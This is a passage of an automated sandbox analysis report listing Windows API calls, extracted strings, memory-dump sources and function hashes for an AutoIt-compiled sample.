                                                                                  • Part of subcall function 0073D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0073D1BA
                                                                                  • Part of subcall function 0073D17C: GetStockObject.GDI32(00000011), ref: 0073D1CE
                                                                                  • Part of subcall function 0073D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0073D1D8
                                                                                • GetWindowRect.USER32(00000000,?), ref: 00789968
                                                                                • GetSysColor.USER32(00000012), ref: 00789982
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                • String ID: static
                                                                                • API String ID: 1983116058-2160076837
                                                                                • Opcode ID: 69086e3211f6ef552b76f93cdd8e6e3e5e3ef169d2e5034756cdbd81cf7e196e
                                                                                • Instruction ID: a2d9079598a79eed9fe76530bf656876a3a156ab57152570f808679c7240f2e6
                                                                                • Opcode Fuzzy Hash: 69086e3211f6ef552b76f93cdd8e6e3e5e3ef169d2e5034756cdbd81cf7e196e
                                                                                • Instruction Fuzzy Hash: 1D113A72550209AFDB14EFB8CC45AFA7BB8FB48354F054619FA56E3250E738E850DB50
                                                                                APIs
                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 00789699
                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007896A8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: LengthMessageSendTextWindow
                                                                                • String ID: edit
                                                                                • API String ID: 2978978980-2167791130
                                                                                • Opcode ID: f6eae3ddfbd48920f3b1661c7a4a91d803a24ade3fee74af397db270a13b369a
                                                                                • Instruction ID: 6f55ff729737c3a518abfac577f608a56ba3c3fd86291e24f71f94ed027ae4da
                                                                                • Opcode Fuzzy Hash: f6eae3ddfbd48920f3b1661c7a4a91d803a24ade3fee74af397db270a13b369a
                                                                                • Instruction Fuzzy Hash: 0D118C71640108ABEF216FA4DC84EFB3B6AEB053B8F544314FA65971E0E739DC50AB64
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007652D5
                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 007652F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: d229fd9bacf0f75bd0b08a846a7a833e05ce1ea5419c9fc3ad238eaa9e6815a7
                                                                                • Instruction ID: 4ac37671fee53cf7241c49f3078084b61cafd90e686b64b21f452d41f173dc30
                                                                                • Opcode Fuzzy Hash: d229fd9bacf0f75bd0b08a846a7a833e05ce1ea5419c9fc3ad238eaa9e6815a7
                                                                                • Instruction Fuzzy Hash: 9A11E276E01614EBDB20DF99DD44B9D77B8AB09B58F040025ED03E7290D3B8ED44EB90
                                                                                APIs
                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00774DF5
                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00774E1E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$OpenOption
                                                                                • String ID: <local>
                                                                                • API String ID: 942729171-4266983199
                                                                                • Opcode ID: 7f6b0abc5baf7b37f39493af9554555b156d4722dead3c825710453855e11635
                                                                                • Instruction ID: 17469998ea5dd67080c91e98c5c50e9e3d1ce9a46027e9c4f61c77361fa3e027
                                                                                • Opcode Fuzzy Hash: 7f6b0abc5baf7b37f39493af9554555b156d4722dead3c825710453855e11635
                                                                                • Instruction Fuzzy Hash: 52117070601621BBDF398F51C889EFBFAA8FF167A5F10C22AF65956540D3B85940C6E0
                                                                                APIs
                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 007537A7
                                                                                • ___raise_securityfailure.LIBCMT ref: 0075388E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                • String ID: (~
                                                                                • API String ID: 3761405300-3406621756
                                                                                • Opcode ID: f28ecee33622470cf175d85e3f1081375f402fb32c18f21b681ac1301ba77e10
                                                                                • Instruction ID: 663dd0caaa72a28e246b2050b063ccb11e4d663a6be081c8e6032e2fca28b943
                                                                                • Opcode Fuzzy Hash: f28ecee33622470cf175d85e3f1081375f402fb32c18f21b681ac1301ba77e10
                                                                                • Instruction Fuzzy Hash: 7D21DFB5602384DAD700EF65EDD66503BB5BB4C314F10D86AE9048E2A0E3FC69C4CBC9
                                                                                APIs
                                                                                • inet_addr.WSOCK32(00000000), ref: 0077A84E
                                                                                • htons.WSOCK32(00000000), ref: 0077A88B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: htonsinet_addr
                                                                                • String ID: 255.255.255.255
                                                                                • API String ID: 3832099526-2422070025
                                                                                • Opcode ID: fc926ac887c6d0c844dfb0ce7895320902758413e31a16669269bc5f87eceec0
                                                                                • Instruction ID: 07bf0f5c29ddc3a1adb7f5f02b81cf8ea99118cbc61847034ad46a400a338a9d
                                                                                • Opcode Fuzzy Hash: fc926ac887c6d0c844dfb0ce7895320902758413e31a16669269bc5f87eceec0
                                                                                • Instruction Fuzzy Hash: 0A01D675200304BBDB229F64D84AFADB364EF85350F10C426F51A9B3D1D779E8058756
                                                                                APIs
                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0075B7EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 02975c28f07050e12bbf728821e2b60748bc0145a65ee88ad82e1372689917d6
                                                                                • Instruction ID: 18cbd145313e03c61a8520470a174cb641aed21ad1a8451f147d0447a7899bdd
                                                                                • Opcode Fuzzy Hash: 02975c28f07050e12bbf728821e2b60748bc0145a65ee88ad82e1372689917d6
                                                                                • Instruction Fuzzy Hash: 630128B1600128EBCB15EBA4DC469FE33B9BF65350700061DF862972C2EBB86C1CC790
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0075B6EB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 4ae7a12ceea97b13c07e7441436c20cf06e25c09f56e1d317ca9b196b6e91afc
                                                                                • Instruction ID: c5bd482cc171b9f292543efbe15e41e90fa1f2b383bda630ff5ed13c91fb646f
                                                                                • Opcode Fuzzy Hash: 4ae7a12ceea97b13c07e7441436c20cf06e25c09f56e1d317ca9b196b6e91afc
                                                                                • Instruction Fuzzy Hash: FE01A2B1A41014ABDB15EBA4D956AFF73B8DF25341F100019B802B7282EBAC5E1D87B5
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0075B76C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 3850602802-1403004172
                                                                                • Opcode ID: 3e1172b9c46a600524ef73e1c31049be5ea7f90f8c5086853de902255fedc6de
                                                                                • Instruction ID: deae86d59224e22c512af67237e4cc01cfd663055ff320ef0706da9662fd7ff8
                                                                                • Opcode Fuzzy Hash: 3e1172b9c46a600524ef73e1c31049be5ea7f90f8c5086853de902255fedc6de
                                                                                • Instruction Fuzzy Hash: E301D6B1640114FBDB11EBA4D906EFE73AC9B69341F10001AB802B3292EBAC5E1D87B5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: "~
                                                                                • API String ID: 3494438863-4097740423
                                                                                • Opcode ID: 1fdfe3c38f9eae26b701a9d6f971457a2e70f9e05d72c39dfb4fa591d72ddca3
                                                                                • Instruction ID: 185081ba84e475c5087f60de2adecb4496e0a0c03e21b77ba61bb4b137f2244b
                                                                                • Opcode Fuzzy Hash: 1fdfe3c38f9eae26b701a9d6f971457a2e70f9e05d72c39dfb4fa591d72ddca3
                                                                                • Instruction Fuzzy Hash: F4F0C87170A6019AE7249B19BC8176667DCF709720F11852BF300CE296E77CC8425E99
                                                                                APIs
                                                                                • LoadImageW.USER32(00720000,00000063,00000001,00000010,00000010,00000000), ref: 00724048
                                                                                • EnumResourceNamesW.KERNEL32(00000000,0000000E,007667E9,00000063,00000000,77080280,?,?,00723EE1,?,?,000000FF), ref: 007941B3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: EnumImageLoadNamesResource
                                                                                • String ID: >r
                                                                                • API String ID: 1578290342-469737457
                                                                                • Opcode ID: 1728d1f29e31f0c88f386412589172b5b6516ba19ba62d43384a954c84836752
                                                                                • Instruction ID: b7ad73fed34cbac24ab4039542a0b36978917055ceb69d2afa512826ae7b046d
                                                                                • Opcode Fuzzy Hash: 1728d1f29e31f0c88f386412589172b5b6516ba19ba62d43384a954c84836752
                                                                                • Instruction Fuzzy Hash: 9EF0F63164135477D2308B15FCC7FC23B59E74DBB4F508106F211AE1D0D2F884D08A98
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp
                                                                                • String ID: #32770
                                                                                • API String ID: 2292705959-463685578
                                                                                • Opcode ID: d057ff7b32cd4e718cb02bb45383daaddbb1f20881d0ad42ff52c8c4716114e1
                                                                                • Instruction ID: 37af9792e0e362d463b64edbe1b46f8039a9c2d5f330bf39ea8ea268acb30bea
                                                                                • Opcode Fuzzy Hash: d057ff7b32cd4e718cb02bb45383daaddbb1f20881d0ad42ff52c8c4716114e1
                                                                                • Instruction Fuzzy Hash: 4EE0227360032467D720AAA59C09E87FBACAB917A4F004026B905D3081E668EA0087D4
                                                                                APIs
                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0075A63F
                                                                                  • Part of subcall function 007413F1: _doexit.LIBCMT ref: 007413FB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Message_doexit
                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                • API String ID: 1993061046-4017498283
                                                                                • Opcode ID: 5cc4dc8e4fa544a94908f0772d108f954da9d0e6397b4aeeb06f7d6e7cc6ced3
                                                                                • Instruction ID: eaa59c7220a4b3a5817a918836b9b06a4e6e9fffc287b70278be1cf7d551c424
                                                                                • Opcode Fuzzy Hash: 5cc4dc8e4fa544a94908f0772d108f954da9d0e6397b4aeeb06f7d6e7cc6ced3
                                                                                • Instruction Fuzzy Hash: 38D012712C432872D62436986C1BFC565489B15B95F044026BB09955C35AEE999141D9
                                                                                APIs
                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0079ACC0
                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0079AEBD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                • String ID: WIN_XPe
                                                                                • API String ID: 510247158-3257408948
                                                                                • Opcode ID: b85e45e11693a36792df132d492e68ef753cf2a8b149fe1793bcc15a917b74e1
                                                                                • Instruction ID: bb3f11d60502871161c1986668e96d2e95004666f4963c8c68295611c31c4597
                                                                                • Opcode Fuzzy Hash: b85e45e11693a36792df132d492e68ef753cf2a8b149fe1793bcc15a917b74e1
                                                                                • Instruction Fuzzy Hash: DFE06570C01109EFCF11DBA4E944AECB7B8AB59301F10D081E042B6560CB385E44DF36
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007886E2
                                                                                • PostMessageW.USER32(00000000), ref: 007886E9
                                                                                  • Part of subcall function 00767A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00767AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: 0c9b6cff95f4265f1ec343a09beaf17dc0348d1e68a3f098c22530d2f595c61e
                                                                                • Instruction ID: e6f3aa7b479c372ac827b6dbf3cccc768cf68cdcffb23f7bd9a6271bdaa97ef6
                                                                                • Opcode Fuzzy Hash: 0c9b6cff95f4265f1ec343a09beaf17dc0348d1e68a3f098c22530d2f595c61e
                                                                                • Instruction Fuzzy Hash: 40D02231380314BBF2786370AC0FFC63A189B45B10F004805B707EA1C0C8E8ED10CB28
                                                                                APIs
                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007886A2
                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007886B5
                                                                                  • Part of subcall function 00767A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00767AD0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: FindMessagePostSleepWindow
                                                                                • String ID: Shell_TrayWnd
                                                                                • API String ID: 529655941-2988720461
                                                                                • Opcode ID: a68d28fd735a5cc2da50113518a2b35a95c119443e5e00926feee345714096c1
                                                                                • Instruction ID: e625f00d58b16bc7cb4d323353ff89fadf58e5655ebbf3c3192754f7494c4a62
                                                                                • Opcode Fuzzy Hash: a68d28fd735a5cc2da50113518a2b35a95c119443e5e00926feee345714096c1
                                                                                • Instruction Fuzzy Hash: 09D01271794314B7F2786770AC0FFC67A189B45B51F104915B74BAA1D0C9E8ED50CB68